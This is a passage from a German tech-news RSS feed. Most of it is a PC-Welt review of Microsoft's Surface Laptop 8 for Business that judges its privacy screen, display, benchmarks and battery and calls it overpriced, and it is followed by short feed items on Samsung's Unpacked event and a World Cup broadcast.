<p>Sie wird über eine neue Taste auf der Tastatur aktiviert, die als F1-Taste neben der Esc-Taste in der obersten Reihe angeordnet ist. Drückt man diese Taste, wird das Display dunkler und passt sich so an, dass es von den Seiten her schwerer lesbar ist. Microsoft erklärt <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">an dieser Stelle</a>, wie der Blickschutz funktioniert, ohne dabei die genaue Funktionsweise zu erläutern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.59.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195220" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Die Datenschutztechnologie nutzt die Fähigkeit des Laptops, die Helligkeit des Displays sowohl entsprechend den Präferenzen des Benutzers als auch in Abhängigkeit vom Umgebungslicht anzupassen. Je dunkler das Display, desto schwieriger wird es für neugierige Passanten, etwas auf dem Bildschirm zu erkennen.</p>



<p>In meinen Tests waren die Ergebnisse nicht eindeutig. In einem abgedunkelten Raum, wurde das Display aus einer Entfernung von einem Meter ab einem seitlichen Winkel von etwa 15 Grad zur Displayachse so dunkel, dass es fast nicht mehr zu erkennen war.</p>



<p>In einem helleren Raum blieb ein größerer Teil des Bildschirminhalts erkennbar. Ich konnte jedoch immer gut erkennen, um welche Art von Inhalt es sich auf dem Bildschirm handelte, auch wenn ich den eigentlichen Text nicht mehr lesen konnte. Ein Teil des Bildschirms blieb immer relativ gut sichtbar, es sei denn, ich saß sehr weit entfernt.</p>



<p>Es ist schwer zu beurteilen, wie effektiv der Blickschutz wirklich ist. Die Wirksamkeit schwankte im selben Raum unter den gleichen Bedingungen einfach zu sehr. Schauen Sie sich einfach mal die folgenden Vergleiche an. Im ersten Beispiel musste ich die Perspektive leicht verändern.</p>



<p>Aus dieser Perspektive scheint der Blickschutz kaum eine Wirkung zu entfalten. Ich habe mir dabei vorgestellt, wie es aus dem Blickwinkel einer Person aussehen würde, die auf einem Gangplatz im Flugzeug sitzt und beiläufig zu meinem Sitz über den Gang hinweg blickt. Aus dieser Perspektive glaube ich nicht wirklich, dass der Blickschutz von Microsoft wirklich funktioniert.</p>



<p>Aus einem anderen Blickwinkel betrachtet sind die Ergebnisse aber gar nicht so schlecht. Es wäre hilfreich gewesen, wenn Microsoft genau mitgeteilt hätte, in welchen Situationen der Blickschutz am wirksamsten arbeitet. In einem abgedunkelten Flugzeug, bei eingeschalteter Deckenbeleuchtung? In einem relativ hellen Raum wie meinem Büro?</p>



<p>In einem schlechter beleuchteten Raum schien der Blickschutz wirksamer zu arbeiten. Aber sollten Sie wirklich Ihre Arbeitsbedingungen anpassen müssen, um von dieser Funktion zu profitieren?</p>



<p>Zudem ist mir eine leichte Fleckbildung auf dem Display aufgefallen, die aussieht wie ein schwacher, staubiger Schleier im Displayglas. Ich vermute, dass dies an der Beschaffenheit des Sichtschutzglases selbst liegt.</p>



<p>Vielleicht wurden hierfür einige der Pixel leicht versetzt? Das Ergebnis ist jedoch deutlich sichtbar: Eine weiße Webseite wirkt bei direkter Betrachtung leicht staubig. Dies ist nicht störend oder ablenkend, aber es war auffällig.</p>



<p>Was die Ein- und Ausgänge betrifft, ist die Ausstattung des Surface Laptop 8 for Business recht übersichtlich: An der linken Seite befinden sich zwei Thunderbolt-4-/USB-C-Anschlüsse, über die mit dem entsprechenden Dock drei 4K-Displays mit 60 Hertz betrieben werden können.</p>



<p>Die Anordnung sorgt jedoch dafür, dass ein Nutzer, der die Maus mit der linken Hand bedient, sich den Platz mit den Displaykabeln teilen muss. Außerdem gibt es einen USB-A-Anschluss und eine Kopfhörerbuchse.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.06.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195221" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Auf der rechten Seite befindet sich der Surface Connect-Anschluss, der beim kleineren Surface Laptop und beim neuen Surface Pro weggefallen ist. Das bedeutet, dass Sie das Gerät entweder mit so gut wie jedem handelsüblichen USB-C-Ladegerät oder mit dem mitgelieferten winzigen 60-Watt-Surface-Ladegerät wieder aufladen können.</p>



<p>Insgesamt wirkt das Design des Surface Laptop 8 for Business robust und gut verarbeitet. Es ist jedoch erwähnenswert, dass das Kühlsystem im Vergleich zu früheren Generationen gänzlich unverändert geblieben ist: Die Luft strömt durch Lüftungsgitter im Scharnier nach außen.</p>



<p>Selbst bei der Standardeinstellung des Laptops (Beste Energieeffizienz) musste ich nicht viel am Rechner tun, damit sich der Lüfter einschaltete. Unter Last war das Lüftergeräusch jedoch meist unauffällig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.10.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195223" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Bildschirm</h2>



<p>Kurzum, mir gefällt der Bildschirm des Surface Laptop 8 for Business einfach nicht.</p>



<p>Auf dem Papier macht das Display noch einen guten Eindruck: Das HDR-Display bietet Dolby Vision IQ-Unterstützung mit adaptiver Farb- und Kontrastanpassung von bis zu 1300:1. Microsoft bietet zwei Anzeigemodi an: sRGB und „Vivid“. Der Hersteller gibt an, dass eine Helligkeit von bis zu 600 Nits erreicht werden kann. Ich habe insgesamt eine Leuchtdichte von 491 Nits gemessen, die jedoch bei aktiviertem Sichtschutz auf 163 Nits sank.</p>



<p>Der Farbraum ist recht gut und blieb sowohl bei aktiviertem als auch bei deaktiviertem Sichtschutz unverändert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.21.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195224" width="1024" height="631" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der Surface Laptop 8 for Business bietet ein Touch-Display. Dieses ist jedoch nur für die Bedienung mit dem Finger ausgelegt. Eine Eingabe per Stift wird nicht unterstützt. Das Display lässt sich ohnehin nicht vollständig zurückklappen, was die Verwendung eines Stifts schwer machen würde.</p>



<p>Was ich am Bildschirm besonders schätze, ist eine oft unterschätzte Funktion: Die variable Bildwiederholfrequenz reicht von 120 Hertz bis hinunter auf 24 Hertz. Das ist großartig. Das 120-Hertz-Display erhöht die Bildwiederholfrequenz, wenn Sie es aktiv nutzen. Dadurch werden Mausbewegungen oder Spiele mit einer höheren Bildwiederholfrequenz dargestellt, was zu flüssigeren Bewegungen führt.</p>



<p>Wenn Sie auf einen statischen Bildschirm schauen, sinkt die Bildwiederholfrequenz auf 24 Hertz – weniger als die herkömmlichen 60 Hertz. Das senkt den Stromverbrauch, ohne dass Sie es wirklich bemerken. Der Akku hält entsprechend länger durch.</p>



<p>Der Bildschirm wirkt allerdings etwas trüb, und es gibt eine leichte Fleckenbildung, die durch den Sichtschutz verursacht wird. Dies sorgt dafür, dass die Auflösung niedriger wirkt, als sie tatsächlich ist. Mit einer Kamera lässt sich dieses Manko nicht wirklich einfangen. Vielleicht bin ich durch die neue Generation von OLED-Displays auch einfach zu verwöhnt. Doch aus meiner Sicht lässt dieser Bildschirm einfach zu viele Wünsche offen.</p>



<h2 class="wp-block-heading">Ton und Mikrofone</h2>



<p>Microsofts Surface-Geräte gehörten zu den ersten Laptops, die mit ihrer Audioqualität überzeugen konnten. Daran hat sich nichts geändert. Die integrierten Omnisonic-Lautsprecher unterstützen Dolby Atmos und bieten mehr Lautstärke, als für einen kleinen Raum nötig wäre. Der Sound klang zwar etwas flacher, als ich ihn in Erinnerung hatte.</p>



<p>Dennoch benötigen Sie für diesen Laptop nicht unbedingt Kopfhörer. Die Audioqualität der verbauten Lautsprecher ist über den gesamten Frequenzbereich hinweg recht gut.</p>



<p>Die beiden Studio-Mikrofone sorgen für eine neue Funktion namens “Voice Focus“. Diese soll in bestimmten, aber nicht näher genannten Anwendungen unterstützt werden. Der Algorithmus konzentriert sich dabei auf Ihre Stimme und nicht auf Geräusche im Hintergrund. Um diese Funktion auszuprobieren, nahm ich meine Stimme mit der Windows-App “Sound Recorder” auf, während ich im Hintergrund Musik und weißes Rauschen abspielte.</p>



<p>Beide Hintergrundgeräusche blieben noch etwas hörbar. Das weiße Rauschen wurde deutlich besser herausgefiltert als der Gesang im Hintergrund. Hier wusste die Software einfach nicht, ob sie die abgespielte Musik beibehalten oder ausblenden sollte. Die meisten neuen Asus-Laptops bieten eine noch bessere Geräuschfilterung.</p>



<h2 class="wp-block-heading">Tastatur und Touchpad</h2>



<p>Die Tastatur gehörte einst auch zu den Aspekten, die ein Surface-Gerät ausgezeichnet haben. Mittlerweile haben die anderen Hersteller jedoch aufgeholt. Mir sind dennoch keine Mängel an der Tastatur des Surface Laptop 8 for Business aufgefallen. Sie ist nicht deutlich besser oder schlechter als andere gute Laptop-Tastaturen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.33.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195225" width="1024" height="722" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der neue Surface Laptop verfügt über die haptischen Touchpads, die Microsoft vor einigen Jahren eingeführt hat. Diese lassen sich über die gesamte Fläche anklicken. Dies ist im Vergleich zu herkömmlichen Touchpads ein echter Pluspunkt. Microsoft arbeitet zudem daran, ein subtiles haptisches Feedback auszulösen, wenn der Mauszeiger über bestimmte Bildschirmelemente bewegt wird, wie das “X” zum Schließen eines Fensters. Der Effekt ist sehr unauffällig, aber dennoch ein nettes kleines Detail.</p>



<p>Das Touchpad lässt sich zudem über die Surface-App anpassen. Diese war auf meinem Testgerät jedoch nicht vorinstalliert. Die App kann jedoch <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">kostenlos aus dem Microsoft Store</a> heruntergeladen werden. Mit der Software können Sie festlegen, welcher Bereich des Surface-Touchpads auf Rechts- und Linksklicks reagiert.</p>



<h2 class="wp-block-heading">Webcam</h2>



<p>Der Surface Laptop 8 for Business verfügt über eine 1080p-Kamera, die die Windows Studio-Effekte wie Hintergrundunschärfe, Bildausschnitt, Blickkontakt und mehr unterstützt. Außerdem bietet sie die Gesichtserkennung, einen wesentlichen Bestandteil der <a href="https://www.pcwelt.de/article/2480916/warum-sie-windows-hello-verwenden-sollten-um-ihren-pc-zu-sichern.html" target="_blank">Windows Hello-Technologie</a>. Während des Testzeitraums hatte ich keinerlei Probleme mit der Anmeldung über die Kamera.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.53.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195226" width="1024" height="596" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich um eine “Business”-Kamera handelt, erwartet man von der Webcam eine professionelle Darstellung unter verschiedenen Lichtverhältnissen. Und unter der hellen LED-Beleuchtung meines Büros funktioniert dies auch gut.</p>



<p>Hier habe ich die Webcam sowohl im hellen Licht unseres Büros als auch bei natürlicherer Beleuchtung in meiner Wohnung getestet.</p>



<p>Offen gestanden war ich von den Ergebnissen nicht sonderlich beeindruckt. Bei natürlicher Beleuchtung (der Himmel war an diesem Tag bewölkt) schnitt die Webcam recht gut ab, obwohl das Bild körniger war, als ich es erwartet hätte. Im Büro wirkte das Bild der Kamera jedoch etwas blass.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.01.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195227" width="1024" height="564" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Leistung</h2>



<p>Derzeit zählt der Intel Core Ultra 300 (<a href="https://www.pcwelt.de/article/2937427/intel-panther-lake-laptop-cpu.html?gad_source=1&amp;gad_campaignid=23842067659&amp;gclid=Cj0KCQjwi8nRBhDhARIsAHZf_pb7YWtNKos2TT2Azmce-HO0WHiai6SycmExhDbngIoE4SM7zBW4V3gaAs7_EALw_wcB" target="_blank">Panther Lake</a>) zu den besten Premium-Laptop-Prozessoren, die Sie im Jahr 2026 kaufen können. Den kürzlich vorgestellten AMD Ryzen AI 400-Prozessor konnten wir noch nicht in einem marktreifen Laptop finden.</p>



<p>Bislang durften wir Panther Lake jedoch nur in größeren Produktivitäts-Laptops mit überlegenen Kühlungslösungen wie dem <a href="https://www.pcwelt.de/article/3025832/die-10-besten-laptops-der-ces-2026.html" target="_blank">Asus ZenBook Duo</a> ausprobieren. Zum besseren Verständnis: Läuft ein Laptop über einen längeren Zeitraum unter hoher Last, kann sich die Performance durch Drosselung reduzieren. Auf diese Weise soll eine gefährliche Überhitzung verhindert werden. Im Fall des Surface Laptop 8 ist dies ein Punkt, auf den Sie besonders achten sollten.</p>



<p>Der Cinebench-2024-CPU-Benchmark umfasst einen “Thermal-Throttling”-Test. Dabei wird der Benchmark wiederholt über einen Zeitraum von zehn Minuten ausgeführt. In diesem Szenario ist eine verminderte Leistung ein Hinweis auf thermische Drosselung. Sie können dann einen einzelnen Durchlauf mit dem Langzeittest vergleichen. So kann festgestellt werden, ob eine Drosselung auftritt. In unserem Fall sank die CPU-Leistung bei einem Vergleich von 773 auf 689 Punkte.</p>



<p>Mit dem 3DMark-Grafiktest lässt sich ebenfalls ein Langzeittest durchführen – in diesem Fall zwanzig Benchmark-Durchläufe – und die Leistung im Verlauf des Tests vergleichen. Hier war der Unterschied noch größer.</p>



<p>Der Benchmark erzielte beim ersten Durchlauf die höchste Punktzahl, fiel dann bei den nachfolgenden Durchläufen auf etwa die Hälfte der Leistung ab und verblieb während der folgenden Testläufe auf diesem Niveau.</p>



<p>Was sagt uns das? In gewisser Weise sind Leistungswerte oft irreführend. Der Surface Laptop 8 funktioniert am zuverlässigsten in kurzen, intensiven Phasen, zumindest was das Gaming betrifft.</p>



<p>Für längere Sitzungen ist das Gerät weniger gut geeignet. Andererseits scheint die Kühlung für CPU-intensive Aufgaben auszureichen. Zu diesen Aufgaben zählen unter anderem das Betriebssystem, das Komprimieren und Dekomprimieren von Dateien sowie allgemeine Anwendungen ohne viele visuelle Elemente. Beachten Sie, dass wir zwar die NPU-Fähigkeiten des Laptops nicht testen, er sich mit seinen 50 TOPS jedoch als <a href="https://www.pcwelt.de/article/2819676/copilot-pc-lohnt-sich-der-kauf-eines-ki-rechners-das-mussen-sie-wissen.html" target="_blank">Copilot-PC</a> qualifiziert.</p>



<p>Ich habe den Surface Laptop 8 for Business mit mehreren 14-Zoll-Laptops der jüngsten Generation verglichen: dem <a href="https://www.pcwelt.de/article/2479359/acer-swift-14-ai-laptop-test.html" target="_blank">Acer Swift X 14 AI</a> und dem verwandten Modell <a href="https://www.pcwelt.de/article/3048294/acer-swift-edge-14-ai-test.html" target="_blank">Acer Swift Edge 14 AI</a>.</p>



<p>Hinzu kamen zwei Panther-Lake-Laptops: der <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Dell XPS 14</a> und der <a href="https://www.pcwelt.de/article/3072282/msi-prestige-flip-14-ai-test.html" target="_blank">MSI Prestige Flip 14 AI</a>. Schließlich habe ich noch zwei Snapdragon-Laptops hinzugefügt: den <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> (2024) mit einem Snapdragon X1 Elite-Chip der ersten Generation sowie den <a href="https://www.pcwelt.de/article/2403490/lenovo-yoga-slim-7x-test.html" target="_blank">Lenovo Yoga Slim 7x Gen 11</a>, der mit einem Snapdragon X2 Elite Extreme-Chip der zweiten Generation ausgestattet ist.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.14.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195228" width="1024" height="588" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der PCMark-10-Test deckt ein breites Spektrum ab, das von Videoanrufen über das Surfen im Internet hin zu CAD-Anwendungen und einigen weniger anspruchsvollen Spielen reicht.</p>



<p>Aufgrund der Vielfalt der getesteten Anwendungen ist dieser Benchmark nach wie vor relevant. Der Surface Laptop profitiert ein wenig von seiner leistungsstarken integrierten GPU, obwohl es sich hierbei in erster Linie um CPU-orientierte Tests handelt.</p>



<p>Für andere Tests, die sich nicht mit PCMark messen lassen, verwenden wir stattdessen Cinebench 2024. Obwohl es eine Version für 2026 gibt, nutzen wir aus Kompatibilitätsgründen weiterhin Cinebench 2024. Auch hier gilt: Panther Lake ist eine leistungsstarke CPU, die bei kurzer Spitzenlast eine hohe Leistung bietet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.25.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195229" width="1024" height="475" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Dieser ausgedehnte Cinebench-Stresstest verdeutlicht jedoch, dass Sie bei längerer Nutzung mit einer geringeren CPU-Leistung rechnen müssen.</p>



<p>Handbrake war ursprünglich der Test, mit dem wir bewerteten, wie gut sich der Laptop und sein Prozessor über einen längeren Zeitraum behaupten können. Die App selbst ist nützlich, auch wenn sie schon älter ist.</p>



<p>Sie transkodiert lediglich eine Videodatei in ein Format, das für die Speicherung auf einem Tablet verwendet wird. Angesichts der Verbreitung von Streaming-Apps findet diese Transkodierung mittlerweile meist im Hintergrund statt. Dennoch ist sie ein wirksames Maß für die dauerhafte CPU-Leistung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.36.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195230" width="1024" height="436" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Unser traditioneller Maßstab für die 3D-Leistung ist der “Time Spy”-Benchmark von 3DMark. Dieser misst die 3D-Leistung auf eine Weise, die ein echtes 3D-Spiel simuliert. Auch hier würde ich erwarten, dass der Surface Laptop recht gut abschneidet – und das tut er auch.</p>



<p>Allerdings sind mir bei den von diesem Laptop gemeldeten Ergebnissen einige übermäßige Schwankungen aufgefallen. Nach einem Kaltstart stiegen die Benchmark-Ergebnisse auf einen Höchstwert von 7.063. Im niedrigsten Fall sank das Ergebnis auf 4.601. Nach jedem Durchlauf ließ ich den Laptop zehn Minuten lang abkühlen.</p>



<p>Bei diesem Gerät zeigen die Ergebnisse jedoch einen deutlichen Unterschied zwischen der Durchführung des Benchmarks zu Beginn des Tages und der Durchführung nach einer Abkühlphase von zehn Minuten im Anschluss an eine Reihe anderer Benchmarks. Dies ist ein ungewöhnliches Verhalten und ein echter Minuspunkt. Ich gehe einfach immer davon aus, dass ein hochwertiger Laptop eine konstante Leistung abliefern kann.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.44.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195231" width="1024" height="351" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich beim Surface Laptop 8 um ein Produktivitätsgerät handelt, habe ich ihn im Hinblick auf Gaming nicht ausgiebig getestet. Allerdings machen Intels XeSS-Upscaling und die Frame-Generierung einen enormen Unterschied.</p>



<p>“Cyberpunk: 2077”, getestet bei einer Auflösung von 1.920 × 1.080 Pixeln und der Einstellung „Low“, erzielte mit der reinen Render-Engine des Spiels eine durchschnittliche Bildrate von 50 Bildern pro Sekunde. Das ist ein schon relativ gut spielbares Ergebnis. Mit aktivierten Zusatzfunktionen stieg die Bildrate jedoch auf 133 Bilder pro Sekunde – was mehr als spielbar ist.</p>



<p>Bitte beachten Sie, dass der Benchmark nur etwa eine Minute lang läuft. Daher ist bei längerem Spielen mit einem Rückgang der Bildrate zu rechnen.</p>



<p>Bei einem Produktivitäts-Laptop lege ich Wert auf außergewöhnliche Leistung. Aber die Akkulaufzeit ist ebenso wichtig. Einige der ersten Panther-Lake-Laptops, die ich getestet habe, verfügten über riesige 99-Wattstunden-Akkus – das zulässige Maximum in Flugzeugen.</p>



<p>Um das Gewicht gering zu halten, lieferte Microsoft den Surface Laptop 8 for Business mit einem 52-Wattstunden-Akku aus. Das wirkt sich natürlich auf die Akkulaufzeit aus, wenn auch nicht dramatisch. Es macht mir keine Sorgen, dass ich für eine Akkulaufzeit von 17,3 Stunden etwas weniger Gewicht mit mir herumschleppen muss. Bei produktiver Arbeit könnte die Laufzeit aber etwas niedriger ausfallen als in unseren Tests.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.52.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195232" width="1024" height="415" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Preis und Verfügbarkeit</h2>



<p>Zum Zeitpunkt der Veröffentlichung ist der Surface Laptop 8 for Business <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">nur bei Microsoft selbst</a> und wenigen anderen Händlern erhältlich. Der Einstiegspreis für das 13,8-Zoll-Modell liegt beim Hersteller bei 2.119 Euro. Dafür gibt es 16 Gigabyte RAM und 256 Gigabyte Speicherplatz. Mit 512-Gigabyte-SSD klettert der Preis auf 2.239 Euro.</p>



<p>Optional ist für ausgewählte 13,8-Zoll-Konfigurationen der integrierte Privacy Screen erhältlich. Ob diese Variante in Deutschland verfügbar ist, geht aus dem Microsoft Store derzeit nicht eindeutig hervor. Als Option steht der Blickschutz bei der Konfiguration noch nicht zur Verfügung.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Würde man den Preis um etwa 1.000 Euro senken, dann ließe sich der Kauf des aktuellen Surface Laptop 8 for Business eher rechtfertigen. So ist dieser Laptop aber einfach viel zu teuer, um ihn zu empfehlen – selbst für die geschäftliche Nutzung.</p>



<p>Es ist erwähnenswert, dass die Laptops, mit denen wir den Surface Laptop primär vergleichen, auch erst kürzlich ausgeliefert wurden. Dadurch sind auch diese Geräte ebenfalls von den Kostensteigerungen bei Arbeitsspeicher und SSD-Speicher betroffen.</p>



<p>Bietet der Surface Laptop ansonsten etwas Überzeugendes? Abgesehen vom Blickschutzbildschirm eigentlich nicht wirklich. Was Leistung und Akkulaufzeit angeht, so gibt es viele Laptops, die diese Werte bei deutlich geringeren Anschaffungskosten sogar übertreffen.</p>



<p>Tatsächlich wirkt diese Generation der Surface-Laptops etwas unentschlossen. Privatkunden würden wahrscheinlich eine etwas leistungsstärkere Grafikeinheit für Spiele bevorzugen, während Geschäftsreisende eher auf eine starke CPU-Leistung Wert legen dürften. Das werden wir wahrscheinlich beim kommenden Surface Laptop für Privatkunden sehen, der vermutlich mit einem Qualcomm Snapdragon X2 Elite-Chip ausgestattet sein wird. Die Akkulaufzeit dürfte in etwa gleich bleiben.</p>



<p>Ich habe das Gefühl, dass ich bereits ausreichend Worte über diesen Laptop verloren habe. Er ist überteuert. Kaufen Sie ihn nicht.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li><strong>Prozessor: Core </strong>Ultra 5 335, Core Ultra 7 366H, Core Ultra X7 368H (getestet: 368H)</li>



<li><strong>Display:</strong> 13,8 Zoll (2.304 × 1.536 Pixel) PixelSense Flow, 24–120 Hertz, Dolby Vision, entspiegelt nach ISO-9241 oder blendfrei mit integriertem Blickschutz (getestet)</li>



<li><strong>Arbeitsspeicher:</strong> 16 Gigabyte/32 Gigabyte/64 Gigabyte LPDDR5X (getestet: 16 Gigabyte)</li>



<li><strong>Speicher:</strong> 256 Gigabyte/512 Gigabyte/1 Terabyte PCIe Gen 4 M.2 NVMe SSD (getestet: 512 Gigabyte)</li>



<li><strong>Grafikkarte:</strong> Iris Arc B390</li>



<li><strong>NPU:</strong> 50 TOPS</li>



<li><strong>Anschlüsse:</strong> 2 × USB-C/Thunderbolt 4, USB-A, 3,5-Millimeter-Kopfhöreranschluss, Surface Connect-Anschluss</li>



<li><strong>Sicherheit:</strong> Windows Hello-Kamera</li>



<li><strong>Kamera: </strong>1080p<strong> </strong>(zum Benutzer gerichtet, Windows Hello)</li>



<li><strong>Akku:</strong> Nennkapazität: 52,3 Wattstunden, tatsächliche Kapazität laut Test: 54,1 Wattstunden</li>



<li><strong>Drahtlos:</strong> Wi-Fi 7, Bluetooth Core 5.4</li>



<li><strong>Audio:</strong> Zwei Studio-Mikrofone, Omnisonic-Lautsprecher mit Dolby Atmos</li>



<li><strong>Betriebssystem:</strong> Windows 11 Pro</li>



<li><strong>Abmessungen:</strong> 301 Millimeter x 220 Millimeter x 17,5 Millimeter</li>



<li><strong>Gewicht:</strong> 1,35 Kilogramm</li>



<li><strong>Farben:</strong> Platin und Mattschwarz</li>



<li><strong>Preise:</strong> ab 2.119 Euro (Testmodell: 2.239 Euro)</li>
</ul>



<p>(<a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" data-type="link" data-id="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Galaxy Unpacked steht bevor: Alle Infos zu Fold 8, Flip 8 und Fold 8 Ultra - CHIP]]></title>
<description><![CDATA[Für den 22. Juli 2026 plant Samsung mal wieder ein großes „Unpacked“-Live-Event. Erwartet werden neue Falter wie das Samsung Galaxy Z Fold 8, aber auch ein völlig neues Smartphone. ANZEIGE. Unabhängig und kostenlos dank Ihres Klicks Die mit einem ...]]></description>
<link>https://tsecurity.de/de/3660923/it-nachrichten/samsung-galaxy-unpacked-steht-bevor-alle-infos-zu-fold-8-flip-8-und-fold-8-ultra-chip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660923/it-nachrichten/samsung-galaxy-unpacked-steht-bevor-alle-infos-zu-fold-8-flip-8-und-fold-8-ultra-chip/</guid>
<pubDate>Sat, 11 Jul 2026 00:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Für den 22. Juli 2026 plant Samsung mal wieder ein großes „Unpacked“-Live-Event. Erwartet werden neue Falter wie das Samsung Galaxy Z Fold 8, aber auch ein völlig neues Smartphone. ANZEIGE. Unabhängig und kostenlos dank Ihres Klicks Die mit einem ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanien vs. Belgien: Hier seht ihr das WM-Viertelfinale im Free-TV]]></title>
<description><![CDATA[Spanien und Belgien duellieren sich bei der Fußball-WM 2026 um den Einzug in das Halbfinale. So empfangt ihr die Begegnung kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	ZDF,																	Bundesliga-Live-Stream: Fußball im Interne...]]></description>
<link>https://tsecurity.de/de/3660685/it-nachrichten/spanien-vs-belgien-hier-seht-ihr-das-wm-viertelfinale-im-free-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660685/it-nachrichten/spanien-vs-belgien-hier-seht-ihr-das-wm-viertelfinale-im-free-tv/</guid>
<pubDate>Fri, 10 Jul 2026 21:32:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Spanien und Belgien duellieren sich bei der Fußball-WM 2026 um den Einzug in das Halbfinale. So empfangt ihr die Begegnung kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
